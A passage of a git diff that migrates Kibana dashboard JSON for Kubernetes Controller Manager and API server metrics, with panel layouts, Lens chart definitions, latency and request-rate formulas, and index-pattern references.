"type": "alphabetical" }, - "filters": [], - "internalReferences": 
[], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "multi_terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "43097f7a-e478-47bc-81c1-7541bd899d46" - ], - "layerId": "f7b7d15b-f8d9-4c06-abf0-7503ae32b8e9", - "layerType": "data", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "35a11916-4ca3-421b-9df2-521f52f21fbb", - "xAccessor": "ed3c7efa-0467-4a57-8d06-0f4775906cc5", - "yConfig": [] - } - ], - "legend": { - "horizontalAlignment": "right", - "isInside": false, - "isVisible": true, - "legendSize": "large", - "maxLines": 1, - "position": "right", - "shouldTruncate": false, - "verticalAlignment": "bottom" + "secondaryFields": [ + "kubernetes.controllermanager.verb" + ], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.controllermanager.host" + }, + "43097f7a-e478-47bc-81c1-7541bd899d46": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Average latency in ms", + "operationType": "formula", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 1, + "suffix": "ms" + } + }, + "formula": "last_value(kubernetes.controllermanager.client.request.duration.us.sum)/last_value(kubernetes.controllermanager.client.request.duration.us.count)/1000", + "isFormulaBroken": false + }, + "references": [ + "43097f7a-e478-47bc-81c1-7541bd899d46X2" + ], + "scale": "ratio" + }, + "43097f7a-e478-47bc-81c1-7541bd899d46X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.controllermanager.client.request.duration.us.sum: *" + }, + "isBucketed": false, + "label": "Part of Average latency in ms", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + 
}, + "scale": "ratio", + "sourceField": "kubernetes.controllermanager.client.request.duration.us.sum" + }, + "43097f7a-e478-47bc-81c1-7541bd899d46X1": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.controllermanager.client.request.duration.us.count: *" + }, + "isBucketed": false, + "label": "Part of Average latency in ms", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.controllermanager.client.request.duration.us.count" + }, + "43097f7a-e478-47bc-81c1-7541bd899d46X2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Average latency in ms", + "operationType": "math", + "params": { + "tinymathAst": { + "args": [ + { + "args": [ + "43097f7a-e478-47bc-81c1-7541bd899d46X0", + "43097f7a-e478-47bc-81c1-7541bd899d46X1" + ], + "name": "divide", + "type": "function" }, - "preferredSeriesType": "area", - "title": "Empty XY chart", - "valueLabels": "hide", - "valuesInLegend": false, - "xTitle": "", - "yTitle": "" + 1000 + ], + "location": { + "max": 150, + "min": 0 + }, + "name": "divide", + "text": "last_value(kubernetes.controllermanager.client.request.duration.us.sum)/last_value(kubernetes.controllermanager.client.request.duration.us.count)/1000", + "type": "function" } + }, + "references": [ + "43097f7a-e478-47bc-81c1-7541bd899d46X0", + "43097f7a-e478-47bc-81c1-7541bd899d46X1" + ], + "scale": "ratio" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + "ed3c7efa-0467-4a57-8d06-0f4775906cc5": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "10s" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + 
"internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 13, - "i": "1bd24fa1-319e-4cae-9d45-d821b06a8034", - "w": 24, - "x": 0, - "y": 71 + "layers": [ + { + "accessors": [ + "43097f7a-e478-47bc-81c1-7541bd899d46" + ], + "layerId": "f7b7d15b-f8d9-4c06-abf0-7503ae32b8e9", + "layerType": "data", + "palette": { + "name": "kibana_palette", + "type": "palette" + }, + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "35a11916-4ca3-421b-9df2-521f52f21fbb", + "xAccessor": "ed3c7efa-0467-4a57-8d06-0f4775906cc5", + "yConfig": [] + } + ], + "legend": { + "horizontalAlignment": "right", + "isInside": false, + "isVisible": true, + "legendSize": "large", + "maxLines": 1, + "position": "right", + "shouldTruncate": false, + "verticalAlignment": "bottom" }, - "panelIndex": "1bd24fa1-319e-4cae-9d45-d821b06a8034", - "title": "Average request latency", - "type": "lens", - "version": "8.6.0" - } - ], - "timeRestore": false, - "title": "[Metrics Kubernetes] Controller Manager", - "version": 1 - }, - "coreMigrationVersion": "8.6.0", - "created_at": "2023-01-11T16:15:05.999Z", - "id": "kubernetes-bf9389f0-0c14-11ed-b760-5d1bccb47f56", - "migrationVersion": { - "dashboard": "8.6.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd:metrics_ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd_0_index_pattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "aef813b5-85d5-46c9-a86a-2e273806d488:indexpattern-datasource-layer-239b73ac-0fc9-44fd-a7c5-2d0281e6b765", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "0599e0ae-2375-4ceb-b12d-2ebec4310cc6:metrics_0599e0ae-2375-4ceb-b12d-2ebec4310cc6_0_index_pattern", 
- "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "2ba53067-d43d-42eb-ac50-2d941977ce95:indexpattern-datasource-layer-76c85206-02c1-4f35-bb0d-c1d4d3ee59d7", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "2ba53067-d43d-42eb-ac50-2d941977ce95:3ed2b7d8-6b77-43b7-8ed3-c52117016d59", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "1cd3ebab-9630-4253-b9a6-5f921e5cb617:indexpattern-datasource-layer-77b347b2-91fa-470f-861d-ada0e175cbc4", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "1cd3ebab-9630-4253-b9a6-5f921e5cb617:b460c8d2-ab24-41ed-aac8-998febec263b", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "3a26dffa-0696-485d-b991-1dbc5092082e:indexpattern-datasource-layer-2b80230c-9cc8-444f-b092-1fbc4d764992", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "3a26dffa-0696-485d-b991-1dbc5092082e:7e0ad24d-199f-4ede-8b71-90152913fa90", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "6a8b9a40-11ec-4790-a38d-2d88c5468f12:indexpattern-datasource-layer-a2facaed-7c02-4fb6-9126-5512b8ffd26f", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "6a8b9a40-11ec-4790-a38d-2d88c5468f12:1c580aea-6c0f-4de6-9c30-f6b9a6964b0d", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "c3fee68f-01c6-49da-a759-2900b1cd15bf:metrics_c3fee68f-01c6-49da-a759-2900b1cd15bf_0_index_pattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "75255ce8-2d49-4b4f-ac0e-a20fe8f4daec:indexpattern-datasource-layer-380c5d66-2e69-4e96-b5fb-ac4e5ab1c807", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "75255ce8-2d49-4b4f-ac0e-a20fe8f4daec:daf730fb-a3b5-400a-acba-cff0c8ba607d", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "303702e1-ba33-49f2-b337-4cc7d7305606:indexpattern-datasource-layer-77da5988-3f03-4e8f-b1e4-39a94d8bec07", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": 
"303702e1-ba33-49f2-b337-4cc7d7305606:236aa40a-181f-4c61-af17-8df4ecba80d3", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "1604f0de-edd6-456e-8670-ab9b33988abb:indexpattern-datasource-layer-d3be0fa3-c7a4-49ba-b8cf-ab79f477f332", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "1604f0de-edd6-456e-8670-ab9b33988abb:a781e55e-e2bc-4b36-b197-1b55842aeff7", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "f8313a9d-ab58-448e-b183-75f914caf53f:metrics_f8313a9d-ab58-448e-b183-75f914caf53f_0_index_pattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "fd90adaf-517f-4b92-a5b5-c29f7a16663b:indexpattern-datasource-layer-1048fff9-f5a4-446b-8173-e9e22d4b1cff", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "fd90adaf-517f-4b92-a5b5-c29f7a16663b:11922ebb-686e-4ad0-a043-e425a0d2ce35", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "91a7ce56-6a49-4b7e-837f-31c184b48c09:indexpattern-datasource-layer-7c7c4b67-a2df-427f-abbd-635e5fa73a9c", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "91a7ce56-6a49-4b7e-837f-31c184b48c09:692cad49-25ea-40b4-87d2-535b5f35ecd4", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "1bd24fa1-319e-4cae-9d45-d821b06a8034:indexpattern-datasource-layer-f7b7d15b-f8d9-4c06-abf0-7503ae32b8e9", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "controlGroup_f53d0d21-4502-4dce-8004-017a92104040:optionsListDataView", - "type": "index-pattern" + "preferredSeriesType": "area", + "title": "Empty XY chart", + "valueLabels": "hide", + "valuesInLegend": false, + "xTitle": "", + "yTitle": "" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" }, - { - "id": "metrics-*", - "name": "controlGroup_df56c430-83b1-436e-8b9c-fb027aaa29ca:optionsListDataView", - "type": "index-pattern" - } + "title": "Average request latency" + 
} ], - "type": "dashboard", - "updated_at": "2023-01-11T16:15:05.999Z", - "version": "WzM0NTEsMV0=" + "timeRestore": false, + "title": "[Metrics Kubernetes] Controller Manager", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd:metrics_ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd_0_index_pattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "aef813b5-85d5-46c9-a86a-2e273806d488:indexpattern-datasource-layer-239b73ac-0fc9-44fd-a7c5-2d0281e6b765", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "0599e0ae-2375-4ceb-b12d-2ebec4310cc6:metrics_0599e0ae-2375-4ceb-b12d-2ebec4310cc6_0_index_pattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "2ba53067-d43d-42eb-ac50-2d941977ce95:indexpattern-datasource-layer-76c85206-02c1-4f35-bb0d-c1d4d3ee59d7", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "2ba53067-d43d-42eb-ac50-2d941977ce95:3ed2b7d8-6b77-43b7-8ed3-c52117016d59", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "1cd3ebab-9630-4253-b9a6-5f921e5cb617:indexpattern-datasource-layer-77b347b2-91fa-470f-861d-ada0e175cbc4", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "1cd3ebab-9630-4253-b9a6-5f921e5cb617:b460c8d2-ab24-41ed-aac8-998febec263b", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "3a26dffa-0696-485d-b991-1dbc5092082e:indexpattern-datasource-layer-2b80230c-9cc8-444f-b092-1fbc4d764992", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "3a26dffa-0696-485d-b991-1dbc5092082e:7e0ad24d-199f-4ede-8b71-90152913fa90", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "6a8b9a40-11ec-4790-a38d-2d88c5468f12:indexpattern-datasource-layer-a2facaed-7c02-4fb6-9126-5512b8ffd26f", + "type": "index-pattern" + }, + { + "id": "metrics-*", + 
"name": "6a8b9a40-11ec-4790-a38d-2d88c5468f12:1c580aea-6c0f-4de6-9c30-f6b9a6964b0d", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "c3fee68f-01c6-49da-a759-2900b1cd15bf:metrics_c3fee68f-01c6-49da-a759-2900b1cd15bf_0_index_pattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "75255ce8-2d49-4b4f-ac0e-a20fe8f4daec:indexpattern-datasource-layer-380c5d66-2e69-4e96-b5fb-ac4e5ab1c807", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "75255ce8-2d49-4b4f-ac0e-a20fe8f4daec:daf730fb-a3b5-400a-acba-cff0c8ba607d", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "303702e1-ba33-49f2-b337-4cc7d7305606:indexpattern-datasource-layer-77da5988-3f03-4e8f-b1e4-39a94d8bec07", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "303702e1-ba33-49f2-b337-4cc7d7305606:236aa40a-181f-4c61-af17-8df4ecba80d3", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "1604f0de-edd6-456e-8670-ab9b33988abb:indexpattern-datasource-layer-d3be0fa3-c7a4-49ba-b8cf-ab79f477f332", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "1604f0de-edd6-456e-8670-ab9b33988abb:a781e55e-e2bc-4b36-b197-1b55842aeff7", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "f8313a9d-ab58-448e-b183-75f914caf53f:metrics_f8313a9d-ab58-448e-b183-75f914caf53f_0_index_pattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "fd90adaf-517f-4b92-a5b5-c29f7a16663b:indexpattern-datasource-layer-1048fff9-f5a4-446b-8173-e9e22d4b1cff", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "fd90adaf-517f-4b92-a5b5-c29f7a16663b:11922ebb-686e-4ad0-a043-e425a0d2ce35", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "91a7ce56-6a49-4b7e-837f-31c184b48c09:indexpattern-datasource-layer-7c7c4b67-a2df-427f-abbd-635e5fa73a9c", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "91a7ce56-6a49-4b7e-837f-31c184b48c09:692cad49-25ea-40b4-87d2-535b5f35ecd4", 
+ "type": "index-pattern"
+ },
+ {
+ "id": "metrics-*",
+ "name": "1bd24fa1-319e-4cae-9d45-d821b06a8034:indexpattern-datasource-layer-f7b7d15b-f8d9-4c06-abf0-7503ae32b8e9",
+ "type": "index-pattern"
+ },
+ {
+ "id": "metrics-*",
+ "name": "controlGroup_f53d0d21-4502-4dce-8004-017a92104040:optionsListDataView",
+ "type": "index-pattern"
+ },
+ {
+ "id": "metrics-*",
+ "name": "controlGroup_df56c430-83b1-436e-8b9c-fb027aaa29ca:optionsListDataView",
+ "type": "index-pattern"
+ }
+ ],
+ "managed": false,
+ "coreMigrationVersion": "8.8.0",
+ "typeMigrationVersion": "8.9.0"
 }
\ No newline at end of file
diff --git a/packages/kubernetes/kibana/dashboard/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56.json b/packages/kubernetes/kibana/dashboard/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56.json
index 16596467da9..307ae49b656 100644
--- a/packages/kubernetes/kibana/dashboard/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56.json
+++ b/packages/kubernetes/kibana/dashboard/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56.json
@@ -1,737 +1,749 @@
 {
- "attributes": {
- "description": "Kubernetes API server metrics",
- "kibanaSavedObjectMeta": {
- "searchSourceJSON": {
- "filter": [
- {
- "$state": {
- "store": "appState"
- },
- "meta": {
- "alias": null,
- "disabled": false,
- "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index",
- "key": "data_stream.dataset",
- "negate": false,
- "params": {
- "query": "kubernetes.apiserver"
- },
- "type": "phrase"
- },
- "query": {
- "match_phrase": {
- "data_stream.dataset": "kubernetes.apiserver"
- }
- }
- }
- ],
+ "id": "kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56",
+ "type": "dashboard",
+ "namespaces": [
+ "default"
+ ],
+ "migrationVersion": {
+ "dashboard": "8.9.0"
+ },
+ "updated_at": "2024-03-13T10:46:00.096Z",
+ "created_at": "2024-03-13T10:46:00.096Z",
+ "version": "WzI1MywyXQ==",
+ "attributes": {
+ "description": "Kubernetes API server metrics",
+ "kibanaSavedObjectMeta": {
+ "searchSourceJSON": {
+ "filter": [
+ {
+ "$state": {
+ "store": "appState"
+ },
+ "meta": {
+ "alias": null,
+ "disabled": false,
+ "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index",
+ "key": "data_stream.dataset",
+ "negate": false,
+ "params": {
+ "query": "kubernetes.apiserver"
+ },
+ "type": "phrase"
+ },
+ "query": {
+ "match_phrase": {
+ "data_stream.dataset": "kubernetes.apiserver"
+ }
+ }
+ }
+ ],
+ "query": {
+ "language": "kuery",
+ "query": ""
+ }
+ }
+ },
+ "optionsJSON": {
+ "darkTheme": false,
+ "hidePanelTitles": false,
+ "useMargins": false
+ },
+ "panelsJSON": [
+ {
+ "version": "8.9.0",
+ "type": "visualization",
+ "gridData": {
+ "h": 5,
+ "i": "d79ccab2-4cce-4e41-ae01-434914884a5f",
+ "w": 48,
+ "x": 0,
+ "y": 0
+ },
+ "panelIndex": "d79ccab2-4cce-4e41-ae01-434914884a5f",
+ "embeddableConfig": {
+ "enhancements": {},
+ "hidePanelTitles": false,
+ "savedVis": {
+ "data": {
+ "aggs": [],
+ "searchSource": {
+ "filter": [],
 "query": {
- "language": "kuery",
- "query": ""
+ "language": "kuery",
+ "query": "" } - } + } + }, + "description": "", + "id": "", + "params": { + "fontSize": 10, + "markdown": "[Kubernetes Overview](#/view/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c),\n[Kubernetes Nodes](#/view/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013), \n[Kubernetes Pods](#/view/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Deployments](#/view/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes StatefulSets](#/view/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes DaemonSets](#/view/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes CronJobs](#/view/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Jobs](#/view/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Volumes](#/view/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes PV/PVC](#/view/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Services](#/view/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes API Server](#/view/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56)", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + }, + "type": "visualization" }, - "optionsJSON": { - "darkTheme": false, - "hidePanelTitles": false, - "useMargins": false + "title": "Kubernetes Dashboards [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 21, + "i": "9db496f9-079b-4ddd-b517-cec815a7e9cb", + "w": 24, + "x": 0, + "y": 5 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": false, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } + "panelIndex": "9db496f9-079b-4ddd-b517-cec815a7e9cb", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-8df21ece-205d-4542-bec9-e381eca92895", + "type": "index-pattern" + } + ], + "state": { + 
"adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "8df21ece-205d-4542-bec9-e381eca92895": { + "columnOrder": [ + "cff4229b-4050-47ef-bb61-9790c5596064", + "42b0785e-95e8-4538-8cc5-b1771f663c0c", + "2e2bcfec-99ac-47fd-b901-bab26b32b3d1", + "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X1", + "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X0" + ], + "columns": { + "2e2bcfec-99ac-47fd-b901-bab26b32b3d1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Rate of Apiserver Requests", + "operationType": "formula", + "params": { + "formula": "counter_rate(max(kubernetes.apiserver.request.count))", + "isFormulaBroken": false + }, + "references": [ + "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X1" + ], + "scale": "ratio", + "timeScale": "s" }, - "description": "", - "id": "", - "params": { - "fontSize": 10, - "markdown": "[Kubernetes Overview](#/view/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c),\n[Kubernetes Nodes](#/view/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013), \n[Kubernetes Pods](#/view/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Deployments](#/view/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes StatefulSets](#/view/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes DaemonSets](#/view/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes CronJobs](#/view/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Jobs](#/view/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Volumes](#/view/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes PV/PVC](#/view/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Services](#/view/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes API Server](#/view/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56)", - "openLinksInNewTab": false + "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Rate of Apiserver 
Requests", + "operationType": "max", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "kubernetes.apiserver.request.count" }, - "title": "", - "type": "markdown", - "uiState": {} - } - }, - "gridData": { - "h": 5, - "i": "d79ccab2-4cce-4e41-ae01-434914884a5f", - "w": 48, - "x": 0, - "y": 0 - }, - "panelIndex": "d79ccab2-4cce-4e41-ae01-434914884a5f", - "title": "Kubernetes Dashboards [Metrics Kubernetes]", - "type": "visualization", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-8df21ece-205d-4542-bec9-e381eca92895", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "8df21ece-205d-4542-bec9-e381eca92895": { - "columnOrder": [ - "cff4229b-4050-47ef-bb61-9790c5596064", - "42b0785e-95e8-4538-8cc5-b1771f663c0c", - "2e2bcfec-99ac-47fd-b901-bab26b32b3d1", - "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X1", - "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X0" - ], - "columns": { - "2e2bcfec-99ac-47fd-b901-bab26b32b3d1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Rate of Apiserver Requests", - "operationType": "formula", - "params": { - "formula": "counter_rate(max(kubernetes.apiserver.request.count))", - "isFormulaBroken": false - }, - "references": [ - "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X1" - ], - "scale": "ratio", - "timeScale": "s" - }, - "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X0": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Rate of Apiserver Requests", - "operationType": "max", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "kubernetes.apiserver.request.count" - }, - "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Rate of Apiserver Requests", - "operationType": 
"counter_rate", - "references": [ - "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X0" - ], - "scale": "ratio", - "timeScale": "s" - }, - "42b0785e-95e8-4538-8cc5-b1771f663c0c": { - "dataType": "string", - "isBucketed": true, - "label": "Top 50 values of kubernetes.apiserver.request.resource", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 50 - }, - "scale": "ordinal", - "sourceField": "kubernetes.apiserver.request.resource" - }, - "cff4229b-4050-47ef-bb61-9790c5596064": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } + "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Rate of Apiserver Requests", + "operationType": "counter_rate", + "references": [ + "2e2bcfec-99ac-47fd-b901-bab26b32b3d1X0" + ], + "scale": "ratio", + "timeScale": "s" + }, + "42b0785e-95e8-4538-8cc5-b1771f663c0c": { + "dataType": "string", + "isBucketed": true, + "label": "Top 50 values of kubernetes.apiserver.request.resource", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - 
"yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "2e2bcfec-99ac-47fd-b901-bab26b32b3d1" - ], - "layerId": "8df21ece-205d-4542-bec9-e381eca92895", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "splitAccessor": "42b0785e-95e8-4538-8cc5-b1771f663c0c", - "xAccessor": "cff4229b-4050-47ef-bb61-9790c5596064" - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right" - }, - "preferredSeriesType": "area", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true - } + "size": 50 + }, + "scale": "ordinal", + "sourceField": "kubernetes.apiserver.request.resource" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + "cff4229b-4050-47ef-bb61-9790c5596064": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "gridData": { - "h": 21, - "i": "9db496f9-079b-4ddd-b517-cec815a7e9cb", - "w": 24, - "x": 0, - "y": 5 + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "9db496f9-079b-4ddd-b517-cec815a7e9cb", - "title": "Apiserver Requests Rate per Resource [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-8df21ece-205d-4542-bec9-e381eca92895", - "type": 
